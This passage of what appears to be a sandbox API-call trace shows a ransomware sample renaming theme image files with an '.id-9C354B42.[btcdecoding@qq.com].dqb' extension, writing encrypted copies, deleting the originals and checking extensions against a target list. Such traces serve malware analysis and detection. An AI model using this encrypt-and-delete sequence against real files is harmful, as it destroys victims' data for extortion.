nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0xb20, lpOverlapped=0x0) returned 1 [0043.027] WriteFile (in: hFile=0x208, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xb30, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xb30, lpOverlapped=0x0) returned 1 [0043.028] ReadFile (in: hFile=0x180, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.028] WriteFile (in: hFile=0x208, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xea, lpOverlapped=0x0) returned 1 [0043.028] SetEndOfFile (hFile=0x208) returned 1 [0043.028] CloseHandle (hObject=0x208) returned 1 [0043.028] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.028] SetEndOfFile (hFile=0x180) returned 1 [0043.029] CloseHandle (hObject=0x180) returned 1 [0043.029] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0043.029] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\preview.gif")) returned 1 [0043.029] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0043.029] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0043.029] lstrlenW (lpString=".doc") returned 4 [0043.029] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0043.029] lstrlenW (lpString=".docx") returned 5 [0043.029] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0043.029] lstrlenW (lpString=".pdf") returned 4 [0043.029] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0043.030] lstrlenW (lpString=".xls") returned 4 [0043.030] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0043.030] lstrlenW (lpString=".xlsx") returned 5 [0043.030] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0043.030] lstrlenW (lpString=".ppt") returned 4 [0043.030] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0043.030] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0043.030] lstrlenW (lpString=".zip") returned 4 [0043.030] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0043.030] lstrlenW (lpString=".rar") returned 4 [0043.030] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0043.030] lstrlenW (lpString=".bz2") returned 4 [0043.030] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0043.030] lstrlenW (lpString=".7z") returned 3 [0043.030] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0043.030] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0043.030] lstrlenW (lpString=".dbf") returned 4 [0043.030] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0043.030] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0043.030] lstrlenW (lpString=".1cd") returned 4 [0043.030] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0043.030] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0043.030] lstrlenW (lpString=".jpg") returned 4 [0043.030] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0043.030] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0043.030] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0043.030] lstrlenW (lpString=".doc") returned 4 [0043.030] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0043.030] lstrlenW (lpString=".docx") returned 5 [0043.030] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0043.030] lstrlenW (lpString=".pdf") returned 4 [0043.030] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0043.030] lstrlenW (lpString=".xls") returned 4 [0043.030] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0043.030] lstrlenW (lpString=".xlsx") returned 5 [0043.031] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0043.031] lstrlenW (lpString=".ppt") returned 4 [0043.031] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0043.031] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0043.031] lstrlenW (lpString=".zip") returned 4 [0043.031] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0043.031] lstrlenW (lpString=".rar") returned 4 [0043.031] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0043.031] lstrlenW (lpString=".bz2") returned 4 [0043.031] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0043.031] lstrlenW (lpString=".7z") returned 3 [0043.031] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0043.031] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0043.031] lstrlenW (lpString=".dbf") returned 4 [0043.031] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0043.031] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0043.031] lstrlenW (lpString=".1cd") returned 4 [0043.031] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0043.031] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0043.031] lstrlenW (lpString=".jpg") returned 4 [0043.031] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0043.138] lstrcmpiW (lpString1=".PNG", lpString2=".dqb") returned 1 [0043.138] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0043.138] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0043.138] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=33009) returned 1 [0043.138] CloseHandle (hObject=0x178) returned 1 [0043.138] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\thmbnail.png")) returned 0x20 [0043.138] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0043.138] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0043.138] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.138] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.138] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0043.139] GetLastError () returned 0x0 [0043.139] ReadFile (in: hFile=0x178, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x80f1, lpOverlapped=0x0) returned 1 [0043.147] WriteFile (in: hFile=0x200, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x8100, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x8100, lpOverlapped=0x0) returned 1 [0043.148] ReadFile (in: hFile=0x178, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.148] WriteFile (in: hFile=0x200, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0043.148] SetEndOfFile (hFile=0x200) returned 1 [0043.148] CloseHandle (hObject=0x200) returned 1 [0043.148] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.148] SetEndOfFile (hFile=0x178) returned 1 [0043.149] CloseHandle (hObject=0x178) returned 1 [0043.149] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0043.149] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\thmbnail.png")) returned 1 [0043.150] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0043.150] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0043.150] lstrlenW (lpString=".doc") returned 4 [0043.150] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0043.150] lstrlenW (lpString=".docx") returned 5 [0043.150] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0043.150] lstrlenW (lpString=".pdf") returned 4 [0043.150] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0043.150] lstrlenW (lpString=".xls") returned 4 [0043.150] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0043.150] lstrlenW (lpString=".xlsx") returned 5 [0043.150] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0043.150] lstrlenW (lpString=".ppt") returned 4 [0043.150] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0043.150] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0043.150] lstrlenW (lpString=".zip") returned 4 [0043.150] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0043.150] lstrlenW (lpString=".rar") returned 4 [0043.150] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0043.150] lstrlenW (lpString=".bz2") returned 4 [0043.150] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0043.150] lstrlenW (lpString=".7z") returned 3 [0043.150] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0043.150] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0043.150] lstrlenW (lpString=".dbf") returned 4 [0043.150] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0043.150] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0043.150] lstrlenW (lpString=".1cd") returned 4 [0043.150] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0043.150] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0043.151] lstrlenW (lpString=".jpg") returned 4 [0043.151] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0043.151] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0043.151] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0043.151] lstrlenW (lpString=".doc") returned 4 [0043.151] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0043.151] lstrlenW (lpString=".docx") returned 5 [0043.151] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0043.151] lstrlenW (lpString=".pdf") returned 4 [0043.151] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0043.151] lstrlenW (lpString=".xls") returned 4 [0043.151] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0043.151] lstrlenW (lpString=".xlsx") returned 5 [0043.151] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0043.151] lstrlenW (lpString=".ppt") returned 4 [0043.151] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0043.151] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0043.151] lstrlenW (lpString=".zip") returned 4 [0043.151] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0043.151] lstrlenW (lpString=".rar") returned 4 [0043.151] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0043.151] lstrlenW (lpString=".bz2") returned 4 [0043.151] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0043.151] lstrlenW (lpString=".7z") returned 3 [0043.151] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0043.151] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0043.151] lstrlenW (lpString=".dbf") returned 4 [0043.151] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0043.151] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0043.151] lstrlenW (lpString=".1cd") returned 4 [0043.151] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0043.151] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0043.151] lstrlenW (lpString=".jpg") returned 4 [0043.151] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0043.152] lstrcmpiW (lpString1=".GIF", lpString2=".dqb") returned 1 [0043.152] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0043.152] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0043.152] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=1925) returned 1 [0043.152] CloseHandle (hObject=0x178) returned 1 [0043.152] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\preview.gif")) returned 0x20 [0043.152] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0043.152] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0043.152] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.152] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.152] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0043.198] GetLastError () returned 0x0 [0043.198] ReadFile (in: hFile=0x178, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x785, lpOverlapped=0x0) returned 1 [0043.200] WriteFile (in: hFile=0x160, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x790, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x790, lpOverlapped=0x0) returned 1 [0043.201] ReadFile (in: hFile=0x178, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.201] WriteFile (in: hFile=0x160, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xea, lpOverlapped=0x0) returned 1 [0043.201] SetEndOfFile (hFile=0x160) returned 1 [0043.201] CloseHandle (hObject=0x160) returned 1 [0043.201] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.201] SetEndOfFile (hFile=0x178) returned 1 [0043.202] CloseHandle (hObject=0x178) returned 1 [0043.202] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0043.204] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\preview.gif")) returned 1 [0043.205] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0043.205] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0043.205] lstrlenW (lpString=".doc") returned 4 [0043.205] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0043.205] lstrlenW (lpString=".docx") returned 5 [0043.205] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0043.205] lstrlenW (lpString=".pdf") returned 4 [0043.205] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0043.205] lstrlenW (lpString=".xls") returned 4 [0043.205] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0043.205] lstrlenW (lpString=".xlsx") returned 5 [0043.205] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0043.205] lstrlenW (lpString=".ppt") returned 4 [0043.205] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0043.205] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0043.205] lstrlenW (lpString=".zip") returned 4 [0043.205] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0043.205] lstrlenW (lpString=".rar") returned 4 [0043.205] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0043.205] lstrlenW (lpString=".bz2") returned 4 [0043.205] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0043.205] lstrlenW (lpString=".7z") returned 3 [0043.205] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0043.205] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0043.205] lstrlenW (lpString=".dbf") returned 4 [0043.205] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0043.206] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0043.206] lstrlenW (lpString=".1cd") returned 4 [0043.206] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0043.206] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0043.206] lstrlenW (lpString=".jpg") returned 4 [0043.206] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0043.206] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0043.206] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0043.206] lstrlenW (lpString=".doc") returned 4 [0043.206] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0043.206] lstrlenW (lpString=".docx") returned 5 [0043.206] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0043.206] lstrlenW (lpString=".pdf") returned 4 [0043.206] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0043.206] lstrlenW (lpString=".xls") returned 4 [0043.206] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0043.206] lstrlenW (lpString=".xlsx") returned 5 [0043.206] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0043.206] lstrlenW (lpString=".ppt") returned 4 [0043.206] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0043.206] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0043.206] lstrlenW (lpString=".zip") returned 4 [0043.206] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0043.206] lstrlenW (lpString=".rar") returned 4 [0043.206] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0043.206] lstrlenW (lpString=".bz2") returned 4 [0043.206] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0043.206] lstrlenW (lpString=".7z") returned 3 [0043.206] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0043.206] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0043.206] lstrlenW (lpString=".dbf") returned 4 [0043.206] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0043.206] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0043.206] lstrlenW (lpString=".1cd") returned 4 [0043.206] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0043.206] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0043.207] lstrlenW (lpString=".jpg") returned 4 [0043.207] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0043.207] lstrcmpiW (lpString1=".PNG", lpString2=".dqb") returned 1 [0043.207] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0043.207] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0043.208] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=27407) returned 1 [0043.208] CloseHandle (hObject=0x178) returned 1 [0043.208] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\thmbnail.png")) returned 0x20 [0043.208] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0043.208] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0043.208] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.208] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.208] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, 